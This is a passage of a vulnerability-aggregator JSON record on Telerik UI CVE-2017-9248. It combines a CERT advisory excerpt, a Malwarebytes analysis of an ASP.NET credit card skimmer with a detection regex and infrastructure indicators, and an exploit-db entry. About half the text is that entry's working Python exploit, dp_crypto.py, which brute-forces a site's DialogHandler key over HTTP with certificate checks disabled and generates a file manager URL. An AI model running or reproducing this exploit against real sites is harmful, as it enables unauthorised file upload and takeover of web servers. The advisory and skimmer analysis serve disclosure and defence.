who use Telerik web components may also be impacted. \n \n--- \n \n### Solution\n\n**Apply an update** \nPlease see the Telerik's [support article](<http://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>) for update information for specific versions. \n \nThe support article also provides information to those who are unable to update their software. \n \n--- \n \n### Vendor Information\n\n838200\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### DotNetNuke Affected\n\nUpdated: July 18, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.dnnsoftware.com/community-blog/cid/155436/critical-security-update--june-2017>\n * <http://www.dnnsoftware.com/community/security/security-center>\n\n### Telerik Affected\n\nUpdated: July 19, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.telerik.com/blogs/security-alert-for-telerik-ui-for-asp.net-ajax-and-progress-sitefinity>\n * <http://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 7.5 | E:ND/RL:ND/RC:ND \nEnvironmental | 5.6 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://www.telerik.com/blogs/security-alert-for-telerik-ui-for-asp.net-ajax-and-progress-sitefinity>\n * <http://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>\n * <http://www.dnnsoftware.com/community-blog/cid/155436/critical-security-update--june-2017>\n * <http://www.dnnsoftware.com/community/security/security-center>\n\n### Acknowledgements\n\nTelerik thanks to Erlend Leiknes, security consultant in Mnemonic AS, and Thanh Van Tien Nguyen for reporting this vulnerability.\n\nThis document was written by Trent Novelly.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2017-9248](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-9248>) \n---|--- \n**Date Public:** | 2017-06-26 \n**Date First Published:** | 2017-07-25 \n**Date Last Updated: ** | 2017-07-25 14:21 UTC \n**Document Revision: ** | 13 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-25T00:00:00", "type": "cert", "title": "Telerik Web UI contains cryptographic weakness", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2017-07-25T14:21:00", "id": "VU:838200", "href": "https://www.kb.cert.org/vuls/id/838200", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2020-07-09T17:54:09", "description": "**Update: 2020-07-09**\n\n_A reader contacted us with information about this series of attacks on .NET sites. There is a known vulnerability ([CVE-2017-9248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9248>)) for Telerik UI for ASP.NET that is being exploited. An attacker can upload .aspx web shells and get remote code execution. [This Telerik page](<https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>) offers advice and patches which we strongly recommend website owners apply, in addition to keeping their version of ASP.NET up-to-date._\n\n--\n\nCybercriminals typically focus on targets that can get them the highest return with the least amount of effort. This is often determined by their ability to scale attacks, and therefore on how prevalent a vulnerability or target system is. Enter: the credit card skimmer.\n\nIn the world of digital skimming, we've seen the most activity on e-commerce content management systems (CMSes), such as Magento and plugins like WooCommerce.\n\nHowever, it is important to remember that attackers can and will go after any victim when the opportunity is there. Case in point: The skimmer we describe today has been active in the wild since mid-April, and is targeting websites hosted on Microsoft IIS servers running the ASP.NET web application framework. \n\n### Unusual victims\n\nAs defenders, we tend to focus a lot of our attention on the same platforms, in large part because most of the compromised websites we flag are built on the LAMP (Linux, Apache, MySQL, and PHP) stack. It's not because those technologies are less secure, but simply because they are so widely adopted.\n\nAnd yet, in this campaign, the credit card skimmer is exclusively focused on websites hosted on Microsoft [IIS](<https://www.iis.net/>) servers and running [ASP.NET](<https://dotnet.microsoft.com/apps/aspnet>), Microsoft's web framework to develop web apps and services.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2020/07/diagram.png)](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/diagram.png> \"\" )Figure 1: Comparing Linux and Windows based web stacks\n\nWe found over a dozen websites that range from sports organizations, health, and community associations to (oddly enough) a credit union. They have been compromised with malicious code injected into one of their existing JavaScript libraries. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2020/07/IIS_ASP.png)](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/IIS_ASP.png> \"\" )Figure 2: A snapshot of victim sites with compromised JS libraries\n\nThere doesn't seem to be a specific JS library being targeted, and the code, which we will review later, sometimes takes different forms. However, all the sites we identified were running ASP.NET version 4.0.30319, which is no longer officially supported and contains multiple [vulnerabilities](<https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-2002/version_id-97706/Microsoft-.net-Framework-4.0.html>).\n\nWhile ASP.NET is not as popular as [PHP](<https://www.php.net/>), especially for smaller businesses and personal blogs, it still accounts for a sizable market share and, as one might expect, includes websites running [shopping cart applications](<https://docs.microsoft.com/en-us/aspnet/web-forms/overview/getting-started/getting-started-with-aspnet-45-web-forms/shopping-cart>). All the compromised sites we identified had a shopping portal, and this is exactly what the attackers were after.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2020/07/MBAM.png)](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/MBAM.png> \"\" )Figure 3: Malwarebytes blocks a domain when visiting an affected portal\n\n### Different types of malicious injection\n\nIn a few instances, the skimmer was loaded remotely. For example, Figure 4 shows a legitimate library where malicious code was appended and obfuscated. It loaded the skimmer from the remote domain thxrq[.]com. The actual file may be named element_main.js, gmt.js, or some other variation.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2020/07/skim3.png)](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/skim3.png> \"\" )Figure 4: Small code injection calls out malicious remote script\n\nHowever, in most cases, we saw the full skimming code being injected directly into the compromised JavaScript library of the affected site. There were several different styles that made identification a little challenging.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2020/07/skim2.png)](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/skim2.png> \"\" )Figure 5: Full skimmer injected directly into legitimate script\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2020/07/skim1_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/skim1_.png> \"\" )Figure 6: Full obfuscated skimmer injected into legitimate script\n\n### Skimmer triggers on credit card number or password\n\nThis skimmer (source code [here](<https://github.com/MBThreatIntel/skimmers/blob/master/null_gif_skimmer.js>)) is designed to not only look for credit card numbers but also passwords, although the latter appears to be incorrectly implemented. We can see those checks with two different calls for the _match_ method.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2020/07/checks_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/checks_.png> \"\" )Figure 7: Checks for credit card pattern and password\n\nThe data is encoded using an interesting logic. \n\n * _charcodeAt()_ method to return the Unicode of each character contained within the string of each specific field\n * _toString() _method to convert that number to a string\n\nThere's an additional twist in that it groups the resulting combined strings by sets of two characters.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2020/07/encoding.png)](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/encoding.png> \"\" )Figure 8: Data encoding process\n\nFinally, the data is exfiltrated via the same domain in a GET request where the filename is a GIF image. When this skimmer is loaded by default, it will also issue a GET request for the file null.gif (no exfiltration data present).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2020/07/urlpath.png)](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/urlpath.png> \"\" )Figure 9: Exfiltration URL build process\n\nIn order to decode data sent in an exfiltration attempt, we need to reverse this logic.\n\n * Take the blurb and create an array of elements with two strings each\n * Use the _parseInt()_ function to transform the two-character string into an integer\n * Use the String _fromCharCode()_ method to convert the Unicode number into a character\n\nHere's how we can take the URL path with encoded data (input) and run it through a piece of JavaScript to see the decoded version of it:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2020/07/decoded.png)](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/decoded.png> \"\" )Figure 10: Script we wrote to decode exfiltrated data\n\n### Campaign likely started mid April\n\nThis skimming campaign likely began sometime in April 2020 as the first domain (hivnd[.]net) part of its infrastructure (31.220.60[.]108) was registered on April 10 by a threat actor using a ProtonMail email address.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2020/07/VirusTotal.png)](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/VirusTotal.png> \"\" )\n\nOSINT data from sources such as urlscan.io [shows various sites](<https://urlscan.io/search/#ip%3A31.220.60.108>) and brands were affected during this time period. Some of those sites already remediated the compromise.\n\nWe started contacting the remaining affected parties in the hope that they would identify the breach and take appropriate actions to harden their infrastructure.\n\n### All platforms and frameworks welcome\n\nCredit card skimming has become a popular activity for cybercriminals over the past few years, and the [increase in online shopping during the pandemic](<https://blog.malwarebytes.com/cybercrime/2020/04/online-credit-card-skimming-increases-by-26-in-march/>) means additional business for them, too.\n\nAttackers do not need to limit themselves to the most popular e-commerce platforms. In fact, any website or technology is fair game, as long as it can be subverted without too much effort. In some cases, we notice \"accidental\" compromises, where some sites get hacked and injected even though they weren't really the intended victims.\n\nMalwarebytes customers are protected against this and other credit card skimming campaigns via web protection technology available in [our desktop software](<http://www.malwarebytes.com>) and through our [Browser Guard extension](<https://www.malwarebytes.com/browserguard/>).\n\n_Thanks to [@unmaskparasites](<https://twitter.com/unmaskparasites>) for sharing additional insight on the affected websites._\n\n### Indicators of Compromise\n\n**Regex to find ASP.NET skimmer injections**\n\n_(jquery\\w+\\|\\|undefined;jquery\\w+={1,5}undefined&&)|(!window\\\\.jqv\\w+&&\\\$jqv\\w+=function\\\\(a\\\$\\\\{return)_\n\n**Skimmer infrastructure**\n \n \n idpcdn-cloud[.]com \n joblly[.]com \n hixrq[.]net \n cdn-xhr[.]com \n rackxhr[.]com \n thxrq[.]com \n hivnd[.]net\n \n \n 31.220.60[.]108\n\nThe post [Credit card skimmer targets ASP.NET sites](<https://blog.malwarebytes.com/threat-analysis/2020/07/credit-card-skimmer-targets-asp-net-sites/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-06T16:36:50", "type": "malwarebytes", "title": "Credit card skimmer targets ASP.NET sites", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2020-07-06T16:36:50", "id": "MALWAREBYTES:50C9DC65EC310574BE96E803DA88D886", "href": "https://blog.malwarebytes.com/threat-analysis/2020/07/credit-card-skimmer-targets-asp-net-sites/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T08:15:29", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-24T00:00:00", "type": "exploitdb", "title": "Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Encryption Keys Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2017-9248", "CVE-2017-9248"], "modified": "2018-01-24T00:00:00", "id": "EDB-ID:43873", "href": "https://www.exploit-db.com/exploits/43873", "sourceData": "# Exploit Title: Telerik UI for ASP.NET AJAX DialogHandler Dialog cracker\r\n# Filename: dp_crypto.py\r\n# Github: https://github.com/bao7uo/dp_crypto\r\n# Date: 2018-01-23\r\n\r\n# Exploit Author: Paul Taylor / Foregenix Ltd\r\n# Website: http://www.foregenix.com/blog\r\n\r\n# Version: Telerik UI for ASP.NET AJAX\r\n# CVE: CVE-2017-9248\r\n# Vendor Advisory: https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness\r\n\r\n# Tested on: Working on versions 2012.3.1308 thru 2017.1.118 (.NET 35, 40, 45)\r\n\r\n#!/usr/bin/python3\r\n\r\n# Author: Paul Taylor / Foregenix Ltd\r\n\r\n# https://github.com/bao7uo/dp_crypto/blob/master/dp_crypto.py\r\n\r\n# dp_crypto - CVE-2017-9248 exploit\r\n# Telerik.Web.UI.dll Cryptographic compromise\r\n\r\n# Warning - no cert warnings,\r\n# and verify = False in code below prevents verification\r\n\r\nimport sys\r\nimport base64\r\nimport requests\r\nimport re\r\nimport binascii\r\n\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\n\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\nrequests_sent = 0\r\nchar_requests = 0\r\n\r\n\r\ndef get_result(plaintext, key, session, pad_chars):\r\n global requests_sent, char_requests\r\n\r\n url = sys.argv[2]\r\n base_pad = (len(key) % 4)\r\n base = '' if base_pad == 0 else pad_chars[0:4 - base_pad]\r\n dp_encrypted = base64.b64encode(\r\n (encrypt(plaintext, key) + base).encode()\r\n ).decode()\r\n request = requests.Request('GET', url + '?dp=' + dp_encrypted)\r\n request = request.prepare()\r\n response = session.send(request, verify=False)\r\n requests_sent += 1\r\n char_requests += 1\r\n\r\n match = re.search(\"(Error Message:)(.+\\n*.+)(</div>)\", response.text)\r\n return True \\\r\n if match is not None \\\r\n and match.group(2) == \"Index was outside the bounds of the array.\" \\\r\n else False\r\n\r\n\r\ndef test_keychar(keychar, found, session, pad_chars):\r\n base64chars = [\r\n \"A\", \"Q\", \"g\", \"w\", \"B\", \"R\", \"h\", \"x\", \"C\", \"S\", \"i\", \"y\",\r\n \"D\", \"T\", \"j\", \"z\", \"E\", \"U\", \"k\", \"0\", \"F\", \"V\", \"l\", \"1\",\r\n \"G\", \"W\", \"m\", \"2\", \"H\", \"X\", \"n\", \"3\", \"I\", \"Y\", \"o\", \"4\",\r\n \"J\", \"Z\", \"p\", \"5\", \"K\", \"a\", \"q\", \"6\", \"L\", \"b\", \"r\", \"7\",\r\n \"M\", \"c\", \"s\", \"8\", \"N\", \"d\", \"t\", \"9\", \"O\", \"e\", \"u\", \"+\",\r\n \"P\", \"f\", \"v\", \"/\"\r\n ]\r\n\r\n duff = False\r\n accuracy_thoroughness_threshold = sys.argv[5]\r\n for bc in range(int(accuracy_thoroughness_threshold)):\r\n # ^^ max is len(base64chars)\r\n sys.stdout.write(\"\\b\\b\" + base64chars[bc] + \"]\")\r\n sys.stdout.flush()\r\n if not get_result(\r\n base64chars[0] * len(found) + base64chars[bc],\r\n found + keychar, session, pad_chars\r\n ):\r\n duff = True\r\n break\r\n return False if duff else True\r\n\r\n\r\ndef encrypt(dpdata, key):\r\n encrypted = []\r\n k = 0\r\n for i in range(len(dpdata)):\r\n encrypted.append(chr(ord(dpdata[i]) ^ ord(key[k])))\r\n k = 0 if k >= len(key) - 1 else k + 1\r\n return ''.join(str(e) for e in encrypted)\r\n\r\n\r\ndef mode_decrypt():\r\n ciphertext = base64.b64decode(sys.argv[2].encode()).decode()\r\n key = sys.argv[3]\r\n print(base64.b64decode(encrypt(ciphertext, key)).decode())\r\n print(\"\")\r\n\r\n\r\ndef mode_encrypt():\r\n plaintext = sys.argv[2]\r\n key = sys.argv[3]\r\n\r\n plaintext = base64.b64encode(plaintext.encode()).decode()\r\n print(base64.b64encode(encrypt(plaintext, key).encode()).decode())\r\n print(\"\")\r\n\r\n\r\ndef test_keypos(key_charset, unprintable, found, session):\r\n pad_chars = ''\r\n for pad_char in range(256):\r\n pad_chars += chr(pad_char)\r\n\r\n for i in range(len(pad_chars)):\r\n for k in range(len(key_charset)):\r\n keychar = key_charset[k]\r\n sys.stdout.write(\"\\b\"*6)\r\n sys.stdout.write(\r\n (\r\n keychar\r\n if unprintable is False\r\n else '+'\r\n ) +\r\n \") [\" + (\r\n keychar\r\n if unprintable is False\r\n else '+'\r\n ) +\r\n \"]\"\r\n )\r\n sys.stdout.flush()\r\n if test_keychar(keychar, found, session, pad_chars[i] * 3):\r\n return keychar\r\n return False\r\n\r\n\r\ndef get_key(session):\r\n global char_requests\r\n found = ''\r\n unprintable = False\r\n\r\n key_length = sys.argv[3]\r\n key_charset = sys.argv[4]\r\n if key_charset == 'all':\r\n unprintable = True\r\n key_charset = ''\r\n for i in range(256):\r\n key_charset += chr(i)\r\n else:\r\n if key_charset == 'hex':\r\n key_charset = '01234567890ABCDEF'\r\n\r\n print(\"Attacking \" + sys.argv[2])\r\n print(\r\n \"to find key of length [\" +\r\n str(key_length) +\r\n \"] with accuracy threshold [\" +\r\n sys.argv[5] +\r\n \"]\"\r\n )\r\n print(\r\n \"using key charset [\" +\r\n (\r\n key_charset\r\n if unprintable is False\r\n else '- all ASCII -'\r\n ) +\r\n \"]\\n\"\r\n )\r\n for i in range(int(key_length)):\r\n pos_str = (\r\n str(i + 1)\r\n if i > 8\r\n else \"0\" + str(i + 1)\r\n )\r\n sys.stdout.write(\"Key position \" + pos_str + \": (------\")\r\n sys.stdout.flush()\r\n keychar = test_keypos(key_charset, unprintable, found, session)\r\n if keychar is not False:\r\n found = found + keychar\r\n sys.stdout.write(\r\n \"\\b\"*7 + \"{\" +\r\n (\r\n keychar\r\n if unprintable is False\r\n else '0x' + binascii.hexlify(keychar.encode()).decode()\r\n ) +\r\n \"} found with \" +\r\n str(char_requests) +\r\n \" requests, total so far: \" +\r\n str(requests_sent) +\r\n \"\\n\"\r\n )\r\n sys.stdout.flush()\r\n char_requests = 0\r\n else:\r\n sys.stdout.write(\"\\b\"*7 + \"Not found, quitting\\n\")\r\n sys.stdout.flush()\r\n break\r\n if keychar is not False:\r\n print(\"Found key: \" +\r\n (\r\n found\r\n if unprintable is False\r\n else \"(hex) \" + binascii.hexlify(found.encode()).decode()\r\n )\r\n )\r\n print(\"Total web requests: \" + str(requests_sent))\r\n return found\r\n\r\n\r\ndef mode_brutekey():\r\n session = requests.Session()\r\n found = get_key(session)\r\n\r\n if found == '':\r\n return\r\n else:\r\n urls = {}\r\n url_path = sys.argv[2]\r\n params = (\r\n '?DialogName=DocumentManager' +\r\n '&renderMode=2' +\r\n '&Skin=Default' +\r\n '&Title=Document%20Manager' +\r\n '&dpptn=' +\r\n '&isRtl=false' +\r\n '&dp='\r\n )\r\n versions = [\r\n '2007.1423', '2007.1521', '2007.1626', '2007.2918',\r\n '2007.21010', '2007.21107', '2007.31218', '2007.31314',\r\n '2007.31425', '2008.1415', '2008.1515', '2008.1619',\r\n '2008.2723', '2008.2826', '2008.21001', '2008.31105',\r\n '2008.31125', '2008.31314', '2009.1311', '2009.1402',\r\n '2009.1527', '2009.2701', '2009.2826', '2009.31103',\r\n '2009.31208', '2009.31314', '2010.1309', '2010.1415',\r\n '2010.1519', '2010.2713', '2010.2826', '2010.2929',\r\n '2010.31109', '2010.31215', '2010.31317', '2011.1315',\r\n '2011.1413', '2011.1519', '2011.2712', '2011.2915',\r\n '2011.31115', '2011.3.1305', '2012.1.215', '2012.1.411',\r\n '2012.2.607', '2012.2.724', '2012.2.912', '2012.3.1016',\r\n '2012.3.1205', '2012.3.1308', '2013.1.220', '2013.1.403',\r\n '2013.1.417', '2013.2.611', '2013.2.717', '2013.3.1015',\r\n '2013.3.1114', '2013.3.1324', '2014.1.225', '2014.1.403',\r\n '2014.2.618', '2014.2.724', '2014.3.1024', '2015.1.204',\r\n '2015.1.225', '2015.1.401', '2015.2.604', '2015.2.623',\r\n '2015.2.729', '2015.2.826', '2015.3.930', '2015.3.1111',\r\n '2016.1.113', '2016.1.225', '2016.2.504', '2016.2.607',\r\n '2016.3.914', '2016.3.1018', '2016.3.1027', '2017.1.118',\r\n '2017.1.228', '2017.2.503', '2017.2.621', '2017.2.711',\r\n '2017.3.913'\r\n ]\r\n\r\n plaintext1 = 'EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,'\r\n plaintext2_raw1 = 'Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version='\r\n plaintext2_raw3 = ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'\r\n plaintext3 = ';AllowMultipleSelection,False,3,False'\r\n\r\n for version in versions:\r\n plaintext2_raw2 = version\r\n plaintext2 = base64.b64encode(\r\n (plaintext2_raw1 +\r\n plaintext2_raw2 +\r\n plaintext2_raw3\r\n ).encode()\r\n ).decode()\r\n plaintext = plaintext1 + plaintext2 + plaintext3\r\n plaintext = base64.b64encode(\r\n plaintext.encode()\r\n ).decode()\r\n ciphertext = base64.b64encode(\r\n encrypt(\r\n plaintext,\r\n found\r\n ).encode()\r\n ).decode()\r\n full_url = url_path + params + ciphertext\r\n urls[version] = full_url\r\n\r\n found_valid_version = False\r\n for version in urls:\r\n url = urls[version]\r\n request = requests.Request('GET', url)\r\n request = request.prepare()\r\n response = session.send(request, verify=False)\r\n if response.status_code == 500:\r\n continue\r\n else:\r\n match = re.search(\r\n \"(Error Message:)(.+\\n*.+)(</div>)\",\r\n response.text\r\n )\r\n if match is None:\r\n print(version + \": \" + url)\r\n found_valid_version = True\r\n break\r\n\r\n if not found_valid_version:\r\n print(\"No valid version found\")\r\n\r\ndef mode_samples():\r\n print(\"Samples for testing decryption and encryption functions:\")\r\n print(\"-d ciphertext key\")\r\n print(\"-e plaintext key\")\r\n print(\"\")\r\n print(\"Key:\")\r\n print(\"DC50EEF37087D124578FD4E205EFACBE0D9C56607ADF522D\")\r\n print(\"\")\r\n print(\"Plaintext:\")\r\n print(\"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,VGVsZXJpay5XZWIuVUkuRWRpdG9yLkRpYWxvZ0NvbnRyb2xzLkRvY3VtZW50TWFuYWdlckRpYWxvZywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxNi4yLjUwNC40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0;AllowMultipleSelection,False,3,False\")\r\n print(\"\")\r\n print(\"Ciphertext:\")\r\n print(\"FhQAWBwoPl9maHYCJlx8YlZwQDAdYxRBYlgDNSJxFzZ9PUEWVlhgXHhxFipXdWR0HhV3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMLciMVMnN9AFJ0Z2EDWG4sPCpnZQMtHhRnWx8SFHBuaHZbEQJgAVdwbjwlcxNeVHY9ARgUOj9qF045eXBkSVMWEXFgX2QxHgRjSRESf1htY0BwHWZKTm9kTz8IcAwFZm0HNSNxBC5lA39zVH57Q2EJDndvYUUzCAVFRBw/KmJiZwAOCwB8WGxvciwlcgdaVH0XKiIudz98Ams6UWFjQ3oCPBJ4X0EzHXJwCRURMnVVXX5eJnZkcldgcioecxdeanMLNCAUdz98AWMrV354XHsFCTVjenh1HhdBfhwdLmVUd0BBHWZgc1RgQCoRBikEamY9ARgUOj9qF047eXJ/R3kFIzF4dkYJJnF7WCcCKgVuaGpHJgMHZWxvaikIcR9aUn0LKg0HAzZ/dGMzV3Fgc1QsfXVWAGQ9FXEMRSECEEZTdnpOJgJoRG9wbj8SfClFamBwLiMUFzZiKX8wVgRjQ3oCM3FjX14oIHJ3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMDMBEXNg9TdXcxVGEDZVVyEixUcUoDHRRNSh8WMUl7dWJfJnl8WHoHbnIgcxNLUlgDNRMELi1SAwAtVgd0WFMGIzVnX3Q3J3FgQwgGMQRjd35CHgJkXG8FbTUWWQNBUwcQNQwAOiRmPmtzY1psfmcVMBNvZUooJy5ZQgkuFENuZ0BBHgFgWG9aVDMlbBdCUgdxMxMELi1SAwAtY35aR20UcS5XZWc3Fi5zQyZ3E0B6c0BgFgBoTmJbUA0ncwMHfmMtJxdzLnRmKG8xUWB8aGIvBi1nSF5xEARBYyYDKmtSeGJWCXQHBmxaDRUhYwxLVX01CyByCHdnEHcUUXBGaHkVBhNjAmh1ExVRWycCCEFiXnptEgJaBmJZVHUeBR96ZlsLJxYGMjJpHFJyYnBGaGQZEhFjZUY+FxZvUScCCEZjXnpeCVtjAWFgSAQhcXBCfn0pCyAvFHZkL3RzeHMHdFNzIBR4A2g+HgZdZyATNmZ6aG5WE3drQ2wFCQEnBD12YVkDLRdzMj9pEl0MYXBGaVUHEi94XGA3HS5aRyAAd0JlXQltEgBnTmEHagAJX3BqY1gtCAwvBzJ/dH8wV3EPA2MZEjVRdV4zJgRjZB8SPl9uA2pHJgMGR2dafjUnBhBBfUw9ARgUOj9qFQR+\")\r\n print(\"\")\r\n\r\n\r\ndef mode_b64e():\r\n print(base64.b64encode(sys.argv[2].encode()).decode())\r\n print(\"\")\r\n\r\n\r\ndef mode_b64d():\r\n print(base64.b64decode(sys.argv[2].encode()).decode())\r\n print(\"\")\r\n\r\n\r\ndef mode_help():\r\n print(\"Usage:\")\r\n print(\"\")\r\n print(\"Decrypt a ciphertext: -d ciphertext key\")\r\n print(\"Encrypt a plaintext: -e plaintext key\")\r\n print(\"Bruteforce key/generate URL: -k url key_length key_charset accuracy\")\r\n print(\"Encode parameter to base64: -b plain_parameter\")\r\n print(\"Decode base64 parameter: -p encoded_parameter\")\r\n print(\"\")\r\n print(\"To test all ascii characters set key_charset to: all, \" +\r\n \"for upper case hex (e.g. machine key) set to hex.\")\r\n print(\"\")\r\n print(\"Maximum accuracy is out of 64 where 64 is the most accurate, \" +\r\n \"accuracy of 9 will usually suffice for a hex, but 21 or more \" +\r\n \"might be needed when testing all ascii characters.\")\r\n print(\"Increase the accuracy argument if no valid version is found.\")\r\n print(\"\")\r\n print(\"Examples to generate a valid file manager URL:\")\r\n print(\"./dp_crypto.py -k http://a/Telerik.Web.UI.DialogHandler.aspx 48 hex 9\")\r\n print(\"./dp_crypto.py -k http://a/Telerik.Web.UI.DialogHandler.aspx 48 all 21\")\r\n print(\"\")\r\n\r\n\r\nsys.stderr.write(\r\n \"\\ndp_crypto by Paul Taylor / Foregenix 